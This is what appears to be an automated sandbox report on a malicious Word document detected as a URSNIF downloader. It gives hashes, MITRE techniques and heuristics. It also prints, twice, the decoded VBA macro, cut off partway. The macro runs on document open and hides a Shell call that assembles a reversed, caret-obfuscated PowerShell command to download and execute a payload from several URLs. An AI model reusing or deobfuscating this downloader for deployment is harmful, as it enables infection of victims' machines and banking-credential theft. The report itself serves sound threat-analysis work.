Office (OLE) malware analysis — malicious · 8da3fba101fa6583

MALICIOUS

Office (OLE)

70.5 KB Created: 2018-09-11 07:42:00 Authoring application: Microsoft Office Word First seen: 2019-04-18

MD5: d79145e6e454b68f05e744bdf2181471 SHA-1: 6aa2d861f55b68222c19994cbb66df0468c5d6c9 SHA-256: 8da3fba101fa658307ba8fee02f80f1f3f3fee4ee23cfdfc016b46198d7006b6

182 Risk Score

Malware Insights

MITRE ATT&CK

T1059.005 Visual Basic T1204.002 Malicious File T1059 Command and Scripting Interpreter

The sample contains a Document_Open VBA macro that utilizes the Shell() function, indicating an attempt to execute arbitrary code. The ClamAV detection as 'Doc.Downloader.URSNIF-6729855-3' strongly suggests a downloader family. The VBA script appears to be obfuscated but the presence of Shell() and the downloader heuristic points to the execution of a second-stage payload.

Heuristics 5

ClamAV: Doc.Downloader.URSNIF-6729855-3 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Doc.Downloader.URSNIF-6729855-3
VBA macros detected medium 2 related findings OLE_VBA_MACROS

Document contains VBA macro code
Shell() call in VBA critical OLE_VBA_SHELL

Shell() call in VBA
Document_Open macro high OLE_VBA_DOCOPEN

Document_Open macro
Embedded URL info EMBEDDED_URL

One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.

URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 5829 bytes

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	5829 bytes
SHA-256: `74e06409e7c7db8acbeafd67e68153846ad79714f9487b68337011c21fbb4053`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "kBWvMBPMwEk" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Private Sub Document_open() On _ Error _ Resume _ Next VarType "roX" + "1411" VarType "RiPjXOpbYcz" + "6904" + "dMzsRndd" + "swiZd" VarType "Vi" + "GajPv" + "YjkK" + "BGjj" VarType "tT" + "335271017" + "jEKDHoL" + "477737334" Shell bPMlIGWcBB + YqnwbZYA + rZnYsPNKodY, Format(vbHide) VarType "PDmFHHi" + "lOqv" VarType "119909393" + "6640" + "U" + "328240991" VarType "313429696" + "LIzYF" + "404746772" + "382355318" VarType "3054" + "F" + "iThj" + "361443742" VarType "6296" + "6265" End Sub Attribute VB_Name = "QQQmmszvVwUt" Function bPMlIGWcBB() On _ Error _ Resume _ Next VarType "rNwju" + "uiiiXBlrHrR" + "6433" + "72373681" VarType "299279284" + "i" tzjaDrmP = Format(Chr(8 + 2 + 17 + 18 + 54)) + "md " + "/V:/" + Format(Chr(5 + 1 + 12 + 12 + 37)) + Format(Chr(2 + 0 + 5 + 5 + 22)) + "^s^" + "et " + "7^9=" VarType "PmtPwjACR" + "248204988" EUZVLY = "^ " + "^ " + "^ ^ " + " " + " ^ " + "^" + " ^ ^" + " }}^{h" VarType "3543" + "7673" zVHvcbS = Format(Chr(8 + 2 + 17 + 18 + 54)) + "t" + "a" + Format(Chr(8 + 2 + 17 + 18 + 54)) + "};" + "^kaer^b" + "^;w" + "^p^" VarType "Kj" + "mmbG" FUhOlBGFYF = "s$ " + "^me" + "t" + "I^" + "-^ekov" + "n" + "^I^;)w" VarType "460229281" + "lEkH" VarType "5973" + "1504" VarType "jS" + "356562770" VarType "153362645" + "308592253" VarType "4820" + "JWQNjhzA" + "458441538" + "zvdcG" dcEmwGqdzfS = "p^s$" + "^ ^,l^G" + "n^$" + "(e^l^i" + "^F^" bPMlIGWcBB = tzjaDrmP + EUZVLY + zVHvcbS + FUhOlBGFYF + dcEmwGqdzfS VarType "jwpr" + "iubMjfiOGbisKL" VarType "CXOOuuN" + "fMH" + "hsU" + "119472988" VarType "Gik" + "wQwNFskKt" End Function Function YqnwbZYA() On _ Error _ Resume _ Next VarType "4403" + "h" FoUESfST = "d^" + "ao" + "^lnwo^D" + ".wFR" + "^$" + "{yrt^{" + ")^bb" + "^" + "u^$ ni" + " lGn$" VarType "iQFjDpiIG" + "cSEMzO" + "NGqvXUGpc" + "1069" VarType "475621159" + "ni" + "174572205" + "353062107" TYoWGXJFo = "(h" + Format(Chr(8 + 2 + 17 + 18 + 54)) + "^" + "aer^of" + ";'e^x" + "^" + "e" + ".'+^" + "O^hN" + "^$^+^'\" + "'^+" + Format(Chr(8 + 2 + 17 + 18 + 54)) + "^il" + "b^u^p" VarType "hE" + "AQRD" VarType "KRJQKbDPXT" + "VEfXZbUlK" VarType "415574151" + "zwYSD" VarType "rbib" + "121996925" LSHzjb = ":vn" + "^e^$=wp" + "s$" + "^;^" + "'14" + "1' ^=^ " + "^O^h" VarType "RlmKaililwhSUz" + "nb" VarType "9017" + "jTUFiVdpBnbW" VarType "lnRqqR" + "wpaCfKI" ohjHllKUNzn = "N$^;)" + "^" + "'^@'" + "(^t^i^l" + "^pS.'^" + "Em6" + "^" VarType "250733332" + "h" + "3981" + "L" VarType "ftDVEwhYX" + "8725" + "197448434" + "Afk" amCSdXY = "xd^0" + Format(Chr(8 + 2 + 17 + 18 + 54)) + "^" + "Oq^3/" + "mo" + Format(Chr(8 + 2 + 17 + 18 + 54)) + ".y" + Format(Chr(8 + 2 + 17 + 18 + 54)) + "na" + "^t^" + "lus" + "n^o" + Format(Chr(8 + 2 + 17 + 18 + 54)) + "^" + "yarr^a" + "//^:^p^" + "t^" + "th^@" + "r^yy^" VarType "OZ" + "hqA" + "490245544" + "pjR" VarType "220687325" + "vtDjvHiQW" VarType "6117" + "V" bJmLilr = "u^Y^jru" + "^U^" + "j/m^o" + Format(Chr(8 + 2 + 17 + 18 + 54)) + "^" + "." + "y^g^o^" + "l^on" + "h" + Format(Chr(8 + 2 + 17 + 18 + 54)) + "ett^" + "en^al^p" + "^l" + "la^ms/" + "/" + "^:^p^tt" + "h@hKVE^" VarType "521648886" + "rwK" + "6455" + "qijj" fqIOUmwlb = "zvp/et^" + "i^s" + "go^l/" + "ku" + "^.o" + Format(Chr(8 + 2 + 17 + 18 + 54)) + "^.^gnit" + "so^" + "h^x^ihp" + "ar^" VarType "431892865" + "1818" + "Jqw" + "A" zzhKdJ = "g//^:p" + "tth" + "@^p^y^i" + "bepYh/^" + "mo" + Format(Chr(8 + 2 + 17 + 18 + 54)) + ".nuf" + "^-" + "p^m^u^" VarType "T" + "pBvENGLRVSGHI" VarType "6342" + "k" + "457036030" + "V" VarType "KGd" + "zfUQ" + "crhRqw" + "RMOdfqYjpPXz" VarType "Tu" + "qn" + "DlUi" + "199802182" oYPjczzl = "jn" + "^en" + "o" + "ys//^:" + "^p" + "t^t ... (truncated)

SHA-256: 74e06409e7c7db8acbeafd67e68153846ad79714f9487b68337011c21fbb4053

Preview script

First 1,000 lines of the extracted script

Attribute VB_Name = "kBWvMBPMwEk"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Sub Document_open()
On _
Error _
Resume _
Next
   VarType "roX" + "1411"
   VarType "RiPjXOpbYcz" + "6904" + "dMzsRndd" + "swiZd"
   VarType "Vi" + "GajPv" + "YjkK" + "BGjj"
   VarType "tT" + "335271017" + "jEKDHoL" + "477737334"
Shell bPMlIGWcBB + YqnwbZYA + rZnYsPNKodY, Format(vbHide)
   VarType "PDmFHHi" + "lOqv"
   VarType "119909393" + "6640" + "U" + "328240991"
   VarType "313429696" + "LIzYF" + "404746772" + "382355318"
   VarType "3054" + "F" + "iThj" + "361443742"
   VarType "6296" + "6265"
End Sub



Attribute VB_Name = "QQQmmszvVwUt"
Function bPMlIGWcBB()

On _
Error _
Resume _
Next
VarType "rNwju" + "uiiiXBlrHrR" + "6433" + "72373681"
   VarType "299279284" + "i"
tzjaDrmP = Format(Chr(8 + 2 + 17 + 18 + 54)) + "md " + "/V:/" + Format(Chr(5 + 1 + 12 + 12 + 37)) + Format(Chr(2 + 0 + 5 + 5 + 22)) + "^s^" + "et " + "7^9="
VarType "PmtPwjACR" + "248204988"
EUZVLY = "^  " + "^ " + "^  ^ " + "     " + " ^ " + "^" + "  ^ ^" + " }}^{h"
VarType "3543" + "7673"
zVHvcbS = Format(Chr(8 + 2 + 17 + 18 + 54)) + "t" + "a" + Format(Chr(8 + 2 + 17 + 18 + 54)) + "};" + "^kaer^b" + "^;w" + "^p^"
VarType "Kj" + "mmbG"
FUhOlBGFYF = "s$ " + "^me" + "t" + "I^" + "-^ekov" + "n" + "^I^;)w"
VarType "460229281" + "lEkH"
   VarType "5973" + "1504"
   VarType "jS" + "356562770"
   VarType "153362645" + "308592253"
   VarType "4820" + "JWQNjhzA" + "458441538" + "zvdcG"
dcEmwGqdzfS = "p^s$" + "^ ^,l^G" + "n^$" + "(e^l^i" + "^F^"
bPMlIGWcBB = tzjaDrmP + EUZVLY + zVHvcbS + FUhOlBGFYF + dcEmwGqdzfS
   VarType "jwpr" + "iubMjfiOGbisKL"
   VarType "CXOOuuN" + "fMH" + "hsU" + "119472988"
   VarType "Gik" + "wQwNFskKt"
End Function
Function YqnwbZYA()

On _
Error _
Resume _
Next
VarType "4403" + "h"
FoUESfST = "d^" + "ao" + "^lnwo^D" + ".wFR" + "^$" + "{yrt^{" + ")^bb" + "^" + "u^$ ni" + " lGn$"
VarType "iQFjDpiIG" + "cSEMzO" + "NGqvXUGpc" + "1069"
   VarType "475621159" + "ni" + "174572205" + "353062107"
TYoWGXJFo = "(h" + Format(Chr(8 + 2 + 17 + 18 + 54)) + "^" + "aer^of" + ";'e^x" + "^" + "e" + ".'+^" + "O^hN" + "^$^+^'\" + "'^+" + Format(Chr(8 + 2 + 17 + 18 + 54)) + "^il" + "b^u^p"
VarType "hE" + "AQRD"
   VarType "KRJQKbDPXT" + "VEfXZbUlK"
   VarType "415574151" + "zwYSD"
   VarType "rbib" + "121996925"
LSHzjb = ":vn" + "^e^$=wp" + "s$" + "^;^" + "'14" + "1' ^=^ " + "^O^h"
VarType "RlmKaililwhSUz" + "nb"
   VarType "9017" + "jTUFiVdpBnbW"
   VarType "lnRqqR" + "wpaCfKI"
ohjHllKUNzn = "N$^;)" + "^" + "'^@'" + "(^t^i^l" + "^pS.'^" + "Em6" + "^"
VarType "250733332" + "h" + "3981" + "L"
   VarType "ftDVEwhYX" + "8725" + "197448434" + "Afk"
amCSdXY = "xd^0" + Format(Chr(8 + 2 + 17 + 18 + 54)) + "^" + "Oq^3/" + "mo" + Format(Chr(8 + 2 + 17 + 18 + 54)) + ".y" + Format(Chr(8 + 2 + 17 + 18 + 54)) + "na" + "^t^" + "lus" + "n^o" + Format(Chr(8 + 2 + 17 + 18 + 54)) + "^" + "yarr^a" + "//^:^p^" + "t^" + "th^@" + "r^yy^"
VarType "OZ" + "hqA" + "490245544" + "pjR"
   VarType "220687325" + "vtDjvHiQW"
   VarType "6117" + "V"
bJmLilr = "u^Y^jru" + "^U^" + "j/m^o" + Format(Chr(8 + 2 + 17 + 18 + 54)) + "^" + "." + "y^g^o^" + "l^on" + "h" + Format(Chr(8 + 2 + 17 + 18 + 54)) + "ett^" + "en^al^p" + "^l" + "la^ms/" + "/" + "^:^p^tt" + "h@hKVE^"
VarType "521648886" + "rwK" + "6455" + "qijj"
fqIOUmwlb = "zvp/et^" + "i^s" + "go^l/" + "ku" + "^.o" + Format(Chr(8 + 2 + 17 + 18 + 54)) + "^.^gnit" + "so^" + "h^x^ihp" + "ar^"
VarType "431892865" + "1818" + "Jqw" + "A"
zzhKdJ = "g//^:p" + "tth" + "@^p^y^i" + "bepYh/^" + "mo" + Format(Chr(8 + 2 + 17 + 18 + 54)) + ".nuf" + "^-" + "p^m^u^"
VarType "T" + "pBvENGLRVSGHI"
   VarType "6342" + "k" + "457036030" + "V"
   VarType "KGd" + "zfUQ" + "crhRqw" + "RMOdfqYjpPXz"
   VarType "Tu" + "qn" + "DlUi" + "199802182"
oYPjczzl = "jn" + "^en" + "o" + "ys//^:" + "^p" + "t^t
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.